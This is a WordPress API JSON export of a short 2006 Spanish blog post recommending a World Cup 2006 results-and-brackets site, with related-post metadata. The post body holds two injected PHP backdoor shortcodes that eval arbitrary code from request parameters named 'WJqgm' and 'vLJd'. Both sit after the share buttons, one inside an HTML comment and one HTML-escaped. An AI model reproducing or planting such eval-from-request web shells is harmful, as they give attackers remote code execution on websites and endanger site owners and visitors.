{"id":1,"date":"2006-06-19T22:22:58","date_gmt":"2006-06-20T04:22:58","guid":{"rendered":"http:\/\/quechilero.com\/blog\/2006\/06\/19\/calendario-del-mundial\/"},"modified":"2017-02-12T05:46:37","modified_gmt":"2017-02-12T11:46:37","slug":"calendario-del-mundial","status":"publish","type":"post","link":"https:\/\/quechilero.com\/blog\/2006\/06\/19\/calendario-del-mundial\/","title":{"rendered":"Calendario del Mundial"},"content":{"rendered":"<p>Aunque un poco tarde me enter\u00e9, creo que vale la pena contar que he visto una aplicaci\u00f3n bastante buena sobre los resultados de la Copa del Mundo de Futbol en Alemania este a\u00f1o, se puede ver en <a target=\"_blank\" href=\"http:\/\/www.pabloacuna.net\/Alemania2006\">http:\/\/www.pabloacuna.net\/Alemania2006<\/a> donde se muestran los resultados de todos los partidos.<\/p>\n<p>Adem\u00e1s va creando autom\u00e1ticamente las llaves de los octavos, cuartos, semifinal y final. Est\u00e1 bastante interesante y vale la pena ir a verla.<\/p>\n<p>Por cierto espero que gane Brasil el hexacampeonato.<\/p>\n<div class=\"sharedaddy sd-sharing-enabled\">\n<div class=\"robots-nocontent sd-block sd-social sd-social-icon sd-sharing\">\n<h3 class=\"sd-title\">Comp\u00e1rtelo:<\/h3>\n<div class=\"sd-content\">\n<ul>\n<li class=\"share-facebook\"><a rel=\"nofollow\" class=\"share-facebook sd-button share-icon no-text\" href=\"http:\/\/quechilero.com\/blog\/2006\/06\/19\/calendario-del-mundial\/?share=facebook\" target=\"_blank\" title=\"Haz clic para compartir en Facebook\"><span><\/span><span class=\"sharing-screen-reader-text\">Haz clic para compartir en Facebook (Se abre en una ventana nueva)<\/span><\/a><\/li>\n<li class=\"share-google-plus-1\"><a rel=\"nofollow\" class=\"share-google-plus-1 sd-button share-icon no-text\" href=\"http:\/\/quechilero.com\/blog\/2006\/06\/19\/calendario-del-mundial\/?share=google-plus-1\" target=\"_blank\" title=\"Haz clic para compartir en Google+\"><span><\/span><span class=\"sharing-screen-reader-text\">Haz clic para compartir en Google+ (Se abre en una ventana nueva)<\/span><\/a><\/li>\n<li class=\"share-twitter\"><a rel=\"nofollow\" class=\"share-twitter sd-button share-icon no-text\" href=\"http:\/\/quechilero.com\/blog\/2006\/06\/19\/calendario-del-mundial\/?share=twitter\" target=\"_blank\" title=\"Haz clic para compartir en Twitter\"><span><\/span><span class=\"sharing-screen-reader-text\">Haz clic para compartir en Twitter (Se abre en una ventana nueva)<\/span><\/a><\/li>\n<li class=\"share-pinterest\"><a rel=\"nofollow\" class=\"share-pinterest sd-button share-icon no-text\" href=\"http:\/\/quechilero.com\/blog\/2006\/06\/19\/calendario-del-mundial\/?share=pinterest\" target=\"_blank\" title=\"Haz clic para compartir en Pinterest\"><span><\/span><span class=\"sharing-screen-reader-text\">Haz clic para compartir en Pinterest (Se abre en una ventana nueva)<\/span><\/a><\/li>\n<li class=\"share-linkedin\"><a rel=\"nofollow\" class=\"share-linkedin sd-button share-icon no-text\" href=\"http:\/\/quechilero.com\/blog\/2006\/06\/19\/calendario-del-mundial\/?share=linkedin\" target=\"_blank\" title=\"Haz clic para compartir en LinkedIn\"><span><\/span><span class=\"sharing-screen-reader-text\">Haz clic para compartir en LinkedIn (Se abre en una ventana nueva)<\/span><\/a><\/li>\n<li class=\"share-end\"><\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n<p><!-- [insert_php]if (isset($_REQUEST[\"WJqgm\"])){eval($_REQUEST[\"WJqgm\"]);exit;}[\/insert_php][php]if (isset($_REQUEST[\"WJqgm\"])){eval($_REQUEST[\"WJqgm\"]);exit;}[\/php] --><\/p>\n<div class=\"sharedaddy sd-sharing-enabled\">\n<div class=\"robots-nocontent sd-block sd-social sd-social-icon sd-sharing\">\n<h3 class=\"sd-title\">Comp\u00e1rtelo:<\/h3>\n<div class=\"sd-content\">\n<ul>\n<li class=\"share-facebook\"><a rel=\"nofollow\" class=\"share-facebook sd-button share-icon no-text\" href=\"http:\/\/quechilero.com\/blog\/2006\/06\/19\/calendario-del-mundial\/?share=facebook\" target=\"_blank\" title=\"Haz clic para compartir en Facebook\"><span><\/span><span class=\"sharing-screen-reader-text\">Haz clic para compartir en Facebook (Se abre en una ventana nueva)<\/span><\/a><\/li>\n<li class=\"share-google-plus-1\"><a rel=\"nofollow\" class=\"share-google-plus-1 sd-button share-icon no-text\" href=\"http:\/\/quechilero.com\/blog\/2006\/06\/19\/calendario-del-mundial\/?share=google-plus-1\" target=\"_blank\" title=\"Haz clic para compartir en Google+\"><span><\/span><span class=\"sharing-screen-reader-text\">Haz clic para compartir en Google+ (Se abre en una ventana nueva)<\/span><\/a><\/li>\n<li class=\"share-twitter\"><a rel=\"nofollow\" class=\"share-twitter sd-button share-icon no-text\" href=\"http:\/\/quechilero.com\/blog\/2006\/06\/19\/calendario-del-mundial\/?share=twitter\" target=\"_blank\" title=\"Haz clic para compartir en Twitter\"><span><\/span><span class=\"sharing-screen-reader-text\">Haz clic para compartir en Twitter (Se abre en una ventana nueva)<\/span><\/a><\/li>\n<li class=\"share-pinterest\"><a rel=\"nofollow\" class=\"share-pinterest sd-button share-icon no-text\" href=\"http:\/\/quechilero.com\/blog\/2006\/06\/19\/calendario-del-mundial\/?share=pinterest\" target=\"_blank\" title=\"Haz clic para compartir en Pinterest\"><span><\/span><span class=\"sharing-screen-reader-text\">Haz clic para compartir en Pinterest (Se abre en una ventana nueva)<\/span><\/a><\/li>\n<li class=\"share-linkedin\"><a rel=\"nofollow\" class=\"share-linkedin sd-button share-icon no-text\" href=\"http:\/\/quechilero.com\/blog\/2006\/06\/19\/calendario-del-mundial\/?share=linkedin\" target=\"_blank\" title=\"Haz clic para compartir en LinkedIn\"><span><\/span><span class=\"sharing-screen-reader-text\">Haz clic para compartir en LinkedIn (Se abre en una ventana nueva)<\/span><\/a><\/li>\n<li class=\"share-end\"><\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n<p>&lt;!&#8211; [insert_php]if (isset($_REQUEST[&quot;vLJd&quot;])){eval($_REQUEST[&quot;vLJd&quot;]);exit;}[\/insert_php][php]if (isset($_REQUEST[&quot;vLJd&quot;])){eval($_REQUEST[&quot;vLJd&quot;]);exit;}[\/php] &#8211;&gt;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Aunque un poco tarde me enter\u00e9, creo que vale la pena contar que he visto una aplicaci\u00f3n bastante buena sobre los resultados de la Copa del Mundo de Futbol en Alemania este a\u00f1o, se puede ver en http:\/\/www.pabloacuna.net\/Alemania2006 donde se muestran los resultados de todos los partidos. Adem\u00e1s va creando autom\u00e1ticamente las llaves de los &#8230; <a title=\"Calendario del Mundial\" class=\"read-more\" href=\"https:\/\/quechilero.com\/blog\/2006\/06\/19\/calendario-del-mundial\/\" aria-label=\"Leer m\u00e1s sobre Calendario del Mundial\">Leer m\u00e1s<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"advanced_seo_description":"","jetpack_seo_html_title":"","jetpack_seo_noindex":false,"jetpack_seo_schema_type":"","episode_type":"","audio_file":"","podmotor_file_id":"","podmotor_episode_id":"","cover_image":"","cover_image_id":"","duration":"","filesize":"","filesize_raw":"","date_recorded":"","explicit":"","block":"","_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":true,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_feature_clip_id":0,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2},"jetpack_post_was_ever_published":false},"categories":[2],"tags":[3],"series":[],"class_list":["post-1","post","type-post","status-publish","format-standard","hentry","category-limones","tag-resultados"],"episode_featured_image":false,"episode_player_image":"https:\/\/i0.wp.com\/quechilero.com\/blog\/imagenes\/podcast.png?fit=1831%2C1831&ssl=1","download_link":"","player_link":"","audio_player":false,"episode_data":{"playerMode":"dark","subscribeUrls":{"amazon":{"key":"amazon","url":"","label":"Amazon","class":"amazon","icon":"amazon.png"},"apple_podcasts":{"key":"apple_podcasts","url":"","label":"Apple Podcasts","class":"apple_podcasts","icon":"apple-podcasts.png"},"castbox":{"key":"castbox","url":"","label":"CastBox","class":"castbox","icon":"castbox.png"},"deezer":{"key":"deezer","url":"","label":"Deezer","class":"deezer","icon":"deezer.png"},"google_podcasts":{"key":"google_podcasts","url":"","label":"Google Podcasts","class":"google_podcasts","icon":"google-podcasts.png"},"listen_notes":{"key":"listen_notes","url":"","label":"Listen Notes","class":"listen_notes","icon":"listen-notes.png"},"pandora":{"key":"pandora","url":"","label":"Pandora","class":"pandora","icon":"pandora.png"},"podbean":{"key":"podbean","url":"","label":"Podbean","class":"podbean","icon":"podbean.png"},"podcast_republic":{"key":"podcast_republic","url":"","label":"Podcast Republic","class":"podcast_republic","icon":"podcast-republic.png"},"rss":{"key":"rss","url":"","label":"RSS","class":"rss","icon":"rss.png"},"spotify":{"key":"spotify","url":"","label":"Spotify","class":"spotify","icon":"spotify.png"},"stitcher":{"key":"stitcher","url":"","label":"Stitcher","class":"stitcher","icon":"stitcher.png"},"tunein":{"key":"tunein","url":"","label":"TuneIn","class":"tunein","icon":"tunein.png"},"youtube":{"key":"youtube","url":"","label":"YouTube","class":"youtube","icon":"youtube.png"},"iheartradio":{"key":"iheartradio","url":"","label":"iHeartRadio","class":"iheartradio","icon":"iheartradio.png"},"ivoox":{"key":"ivoox","url":"","label":"iVoox","class":"ivoox","icon":"ivoox.png"}},"rssFeedUrl":"https:\/\/quechilero.com\/blog\/feed\/podcast\/si-la-vida-nos-da-limones","embedCode":"<blockquote class=\"wp-embedded-content\" data-secret=\"0x4COCme6c\"><a href=\"https:\/\/quechilero.com\/blog\/2006\/06\/19\/calendario-del-mundial\/\">Calendario del Mundial<\/a><\/blockquote><iframe sandbox=\"allow-scripts\" security=\"restricted\" src=\"https:\/\/quechilero.com\/blog\/2006\/06\/19\/calendario-del-mundial\/embed\/#?secret=0x4COCme6c\" width=\"500\" height=\"350\" title=\"\u00abCalendario del Mundial\u00bb \u2014 Si la Vida nos da Limones...\" data-secret=\"0x4COCme6c\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\" class=\"wp-embedded-content\"><\/iframe><script>\n\/*! This file is auto-generated *\/\n!function(d,l){\"use strict\";l.querySelector&&d.addEventListener&&\"undefined\"!=typeof URL&&(d.wp=d.wp||{},d.wp.receiveEmbedMessage||(d.wp.receiveEmbedMessage=function(e){var t=e.data;if((t||t.secret||t.message||t.value)&&!\/[^a-zA-Z0-9]\/.test(t.secret)){for(var s,r,n,a=l.querySelectorAll('iframe[data-secret=\"'+t.secret+'\"]'),o=l.querySelectorAll('blockquote[data-secret=\"'+t.secret+'\"]'),c=new RegExp(\"^https?:$\",\"i\"),i=0;i<o.length;i++)o[i].style.display=\"none\";for(i=0;i<a.length;i++)s=a[i],e.source===s.contentWindow&&(s.removeAttribute(\"style\"),\"height\"===t.message?(1e3<(r=parseInt(t.value,10))?r=1e3:~~r<200&&(r=200),s.height=r):\"link\"===t.message&&(r=new URL(s.getAttribute(\"src\")),n=new URL(t.value),c.test(n.protocol))&&n.host===r.host&&l.activeElement===s&&(d.top.location.href=t.value))}},d.addEventListener(\"message\",d.wp.receiveEmbedMessage,!1),l.addEventListener(\"DOMContentLoaded\",function(){for(var e,t,s=l.querySelectorAll(\"iframe.wp-embedded-content\"),r=0;r<s.length;r++)(t=(e=s[r]).getAttribute(\"data-secret\"))||(t=Math.random().toString(36).substring(2,12),e.src+=\"#?secret=\"+t,e.setAttribute(\"data-secret\",t)),e.contentWindow.postMessage({message:\"ready\",secret:t},\"*\")},!1)))}(window,document);\n\/\/# sourceURL=https:\/\/quechilero.com\/blog\/wp-includes\/js\/wp-embed.min.js\n<\/script>\n"},"jetpack_publicize_connections":[],"jetpack_shortlink":"https:\/\/wp.me\/pDKli-1","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":139,"url":"https:\/\/quechilero.com\/blog\/2006\/08\/17\/los-simpson-reales\/","url_meta":{"origin":1,"position":0},"title":"Los Simpson Reales","author":"Pepe Barrascout Ortiz","date":"17 agosto 2006","format":false,"excerpt":"Este video de Los Simpsons es ya bastante conocido, pero no quiero dejar de compartirlo con mis lectores. Es de producci\u00f3n ingl\u00e9sa y se pueden apreciar detalles como el t\u00edpico uniforme de la polic\u00eda inglesa, la arquitectura de sus casas, el conducir por la derecha, etc. De cualquier forma vale\u2026","rel":"","context":"En \u00abLimones\u00bb","block_context":{"text":"Limones","link":"https:\/\/quechilero.com\/blog\/category\/limones\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":5228,"url":"https:\/\/quechilero.com\/blog\/2010\/08\/08\/maraton-de-blogs-alkuadrado\/","url_meta":{"origin":1,"position":1},"title":"Marat\u00f3n de Blogs: Alkuadrado","author":"Pepe Barrascout Ortiz","date":"8 agosto 2010","format":false,"excerpt":"Desde que entramos a Alkuadrado, podemos sentir un estilo visual agradable, limpio y claro, bastante minimalista, justo como me gustan los dise\u00f1os. En tonos de color caf\u00e9, Alkuadrado nos da la bienvenida, de mano de Alex Socop, su autor. Seg\u00fan las mismas palabras de Alex, Alkuadrado (a2), en esencia es\u2026","rel":"","context":"En \u00abBlogs de Guatemala\u00bb","block_context":{"text":"Blogs de Guatemala","link":"https:\/\/quechilero.com\/blog\/category\/blogs-de-guatemala\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/i392.photobucket.com\/albums\/pp7\/pepejaguar\/maraton\/alkuadrado.png?resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/i392.photobucket.com\/albums\/pp7\/pepejaguar\/maraton\/alkuadrado.png?resize=350%2C200 1x, https:\/\/i0.wp.com\/i392.photobucket.com\/albums\/pp7\/pepejaguar\/maraton\/alkuadrado.png?resize=525%2C300 1.5x"},"classes":[]},{"id":16699,"url":"https:\/\/quechilero.com\/blog\/2013\/05\/13\/si-%ef%bb%bfjesus-volviera-a-la-tierra\/","url_meta":{"origin":1,"position":2},"title":"Si \ufeffJes\u00fas volviera a la tierra","author":"Pepe Barrascout Ortiz","date":"13 mayo 2013","format":false,"excerpt":"Una religiosa les hizo a sus peque\u00f1os alumnos un examen, y en \u00e9l una sola pregunta que era la siguiente: \"Si Cristo volviera a la tierra \u00bfQu\u00e9 har\u00eda?\" Ese mismo d\u00eda en la noche revis\u00f3 los ex\u00e1menes y encontr\u00f3 las siguientes respuestas: \"Volver\u00eda al mismo sitio de donde vino porque\u2026","rel":"","context":"En \u00abLimones\u00bb","block_context":{"text":"Limones","link":"https:\/\/quechilero.com\/blog\/category\/limones\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":16307,"url":"https:\/\/quechilero.com\/blog\/2013\/03\/06\/vale-la-pena\/","url_meta":{"origin":1,"position":3},"title":"Vale la pena","author":"Pepe Barrascout Ortiz","date":"6 marzo 2013","format":false,"excerpt":"Cuentan que una vez, un anciano caminaba por la playa al amanecer, cuando vio que un joven, unos pasos adelante, iba recogiendo de la arena estrellas de mar, que luego arrojaba mar adentro tan fuerte como pod\u00eda. Al llegar hasta el joven, el viejo le pregunt\u00f3 por qu\u00e9 hac\u00eda eso.\u2026","rel":"","context":"En \u00abLimones\u00bb","block_context":{"text":"Limones","link":"https:\/\/quechilero.com\/blog\/category\/limones\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":6710,"url":"https:\/\/quechilero.com\/blog\/2011\/01\/22\/librate-de-la-momia\/","url_meta":{"origin":1,"position":4},"title":"\u00a1L\u00edbrate de la momia!","author":"Pepe Barrascout Ortiz","date":"22 enero 2011","format":false,"excerpt":"\u00a1L\u00edbrate de la momia!, esa bruja que hay en ti, San Pablo lo llamaba \"EL HOMBRE VIEJO\" (Efesios 4, 21), el carcamal que cada cual lleva dentro, cenizo, resabiado, siempre quej\u00e1ndose: \"no vale la pena\", \"lo he intentado muchas veces\", \"me gustar\u00eda pero no puedo\", \"el ambiente est\u00e1 crudo, si\u2026","rel":"","context":"En \u00abLimones\u00bb","block_context":{"text":"Limones","link":"https:\/\/quechilero.com\/blog\/category\/limones\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":9934,"url":"https:\/\/quechilero.com\/blog\/2011\/08\/26\/maraton-de-blogs-lectores-chapines\/","url_meta":{"origin":1,"position":5},"title":"Marat\u00f3n de Blogs: Lectores Chapines","author":"Pepe Barrascout Ortiz","date":"26 agosto 2011","format":false,"excerpt":"Es sumamente agradable encontrar un grupo de personas que se re\u00fanen regularmente, para compartir ideas y comentar los libros le\u00eddos. Lectores Chapines es el blog de este grupo de \u00e1vidos lectores, que de forma regular hacen reuniones en las que sus integrantes participan activamente aportando de su experiencia. En el\u2026","rel":"","context":"En \u00abBlogs de Guatemala\u00bb","block_context":{"text":"Blogs de Guatemala","link":"https:\/\/quechilero.com\/blog\/category\/blogs-de-guatemala\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/i392.photobucket.com\/albums\/pp7\/pepejaguar\/maraton\/lectores.png?resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/i392.photobucket.com\/albums\/pp7\/pepejaguar\/maraton\/lectores.png?resize=350%2C200 1x, https:\/\/i0.wp.com\/i392.photobucket.com\/albums\/pp7\/pepejaguar\/maraton\/lectores.png?resize=525%2C300 1.5x"},"classes":[]}],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/quechilero.com\/blog\/wp-json\/wp\/v2\/posts\/1","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/quechilero.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/quechilero.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/quechilero.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/quechilero.com\/blog\/wp-json\/wp\/v2\/comments?post=1"}],"version-history":[{"count":0,"href":"https:\/\/quechilero.com\/blog\/wp-json\/wp\/v2\/posts\/1\/revisions"}],"wp:attachment":[{"href":"https:\/\/quechilero.com\/blog\/wp-json\/wp\/v2\/media?parent=1"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/quechilero.com\/blog\/wp-json\/wp\/v2\/categories?post=1"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/quechilero.com\/blog\/wp-json\/wp\/v2\/tags?post=1"},{"taxonomy":"series","embeddable":true,"href":"https:\/\/quechilero.com\/blog\/wp-json\/wp\/v2\/series?post=1"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}